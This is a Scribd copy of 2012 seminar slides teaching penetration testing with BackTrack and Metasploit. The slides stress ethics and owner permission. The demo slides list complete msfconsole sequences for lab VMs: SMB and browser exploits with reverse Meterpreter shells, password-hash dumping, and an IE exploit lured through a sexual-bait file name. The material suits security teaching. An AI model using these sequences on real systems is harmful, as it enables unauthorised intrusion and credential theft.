KEMBAR78
Metasploit for Penetration Testing | PDF | Secure Communication | Computer Engineering
Scribd
Upload
1K views35 pages

Metasploit for Penetration Testing

The document discusses penetration testing using Metasploit. It provides an agenda that includes an overview of penetration testing and Metasploit, demonstrating Metasploit basics and the Meterpreter payload. It then demonstrates how to use Metasploit to exploit vulnerabilities on different operating systems like Windows XP, Windows 2003 Server, Windows 7 and Ubuntu 8.04. The document emphasizes the importance of ethics during penetration testing and references resources for further information.

Uploaded by

fl3xu5
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
1K views35 pages

Metasploit for Penetration Testing

The document discusses penetration testing using Metasploit. It provides an agenda that includes an overview of penetration testing and Metasploit, demonstrating Metasploit basics and the Meterpreter payload. It then demonstrates how to use Metasploit to exploit vulnerabilities on different operating systems like Windows XP, Windows 2003 Server, Windows 7 and Ubuntu 8.04. The document emphasizes the importance of ethics during penetration testing and references resources for further information.

Uploaded by

fl3xu5
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 35

penetration testing with metasploit

Presented by Syarif 3xu5


Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang

Sunday, April 29, 12

Agenda

Why & Whats Penetration Testing ( Pentest ) << back|track Overview Metasploit Basic & Meterpreter DEMO :)

Sunday, April 29, 12

Why Do a Pentest
Millions of dollars investment in security A Penetration Test is one of the most
effective ways to identify systemic weaknesses and deciencies in these programs *1) program to protect critical infrastructures , prevent data breaches *1)

Sunday, April 29, 12

Whats Penetration Testing

A method to evaluate the security of computer system / network Practice ( attacking ) an IT System like a hacker do

Find a security holes ( systemic weaknesses ) By pass security mechanism compromise an Organizations IT System Security

Must have a permission from IT System Owner !

illegal activity put you in a Jail


Sunday, April 29, 12

Ethics
Think before Act Dont be Stupid Dont be malicious

Sunday, April 29, 12

Pentest Phase
Reporting Post Exploitation Exploitation Vulnerability Analysis Information Gathering

Sunday, April 29, 12

<< back|track overview

Lets Watching the Video :)

Sunday, April 29, 12

<< back|track overview


The Most Advanced Linux Security Distribution

Real World Pentesting Tools

. Developed for Security Professional


Open Source & Always be

Sunday, April 29, 12

<< back|track overview

Sunday, April 29, 12

<< back|track overview

Sunday, April 29, 12

Whats
Not just a tool, but an entire framework *1) an Open source platform for writing
security tools and exploits *2) exploits, payloads, encoders,

Easily build attack vectors to add its Create and execute more advanced attack Ruby based
Sunday, April 29, 12

Metasploit interfaces
MSFconsole MSFcli msfweb, msfgui ( discontinued ) Metasploit Pro, Metasploit Express Armitage
Sunday, April 29, 12

MSFconsole

Sunday, April 29, 12

MSFcli

Sunday, April 29, 12

Metasploit Terminology

Exploit : code that allow a pentester take some advantages of a aw within system,application, or service *1) Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) Shellcode : a set of instructions used as payload when exploitation occurs *1) Module : a software that can be used by metasploit *1) Listener : a component for waiting an incoming connection *1)

Sunday, April 29, 12

How does exploitation works


2 1
exploit + payload exploit run , then payload run

Upload / Download data

attacker

vulnerable server

Sunday, April 29, 12

Traditional Pentest Vs Metasploit


Traditional Pentest
Public Exploit Gathering Change offsets Replace ShellCode

Metasploit for Pentest


Load Metasploit Choose the target OS Use exploit SET Payload Execute

Sunday, April 29, 12

Meterpreter

as a payload after vulnerability is exploited *1) Improve the post exploitation

Sunday, April 29, 12

Meterpreter
Exploiting a vulnerability meterpreter shell Select a meterpreter as a payload

Sunday, April 29, 12

Meterpreter command

Sunday, April 29, 12

Meterpreter command

Sunday, April 29, 12

Meterpreter command

Sunday, April 29, 12

Meterpreter command

Sunday, April 29, 12

Meterpreter command

Sunday, April 29, 12

Pentest Scenario

* attacker vulnerable OS on VMware


* : Ubuntu 8.04 metasploitable

Sunday, April 29, 12

OS in the Lab

BackTrack 5 R 2

IP address : 172.16.240.143

Windows Xp SP 2 IP address : 172.16.240.129

Windows 2003 Server IP address : 172.16.240.141

Windows 7 IP address : 172.16.240.142

Ubuntu Linux 8.04 ( Metasploitable ) IP address : 172.16.240.144

Sunday, April 29, 12

Windows XP Exploitation

msf > search windows/smb msf > info exploit/windows/smb/ms08_067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

Sunday, April 29, 12

Windows XP Post Exploitation

session -i 1 meterpreter > getsystem -h getuid hashdump

Sunday, April 29, 12

Windows 2003 Server Exploitation



msf > search windows/smb msf > info exploit/windows/smb/ms08_067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

Sunday, April 29, 12

Windows 7 Exploitation

msf > use exploit/windows/browser/ms11_003_ie_css_import msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms11_003_ie_css_import) > show options msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set LPORT 443 msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi

Sunday, April 29, 12

Windows 7 Exploitation

msf exploit(ms11_003_ie_css_import) > sessions -l msf exploit(ms11_003_ie_css_import) > sessions -i 1 meterpreter > sysinfo meterpreter > shell

Sunday, April 29, 12

Ubuntu 8.04 Metasploitable Exploitation


Sunday, April 29, 12

search distcc use exploit/unix/misc/distcc_exec show payloads set PAYLOAD cmd/unix/reverse show options set rhost 172.16.240.144 set lhost 172.16.240.143 exploit

Any Question ?
Contact me

website : http://3x.us Ofcial BackTrack Indonesia Community :


http://indobacktrack.or.id

Email : 3xu5@indobacktrack.or.id twitter : @3xu5


Sunday, April 29, 12

Greet & Thanks To


BackTrack Linux Metasploit Team ( HD Moore & rapid7 ) Offensive Security / Metasploit Unleashed David Kennedy Georgia Weidman
Sunday, April 29, 12

References

Sunday, April 29, 12

1. Metasploit The Penetration Testers Guide : David Kennedy , Jim OGorman, Devon Kearns, Mati Aharoni 2. http://www.metasploit.com 3. http://www.offensive-security.com/metasploitunleashed/Main_Page 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines

You might also like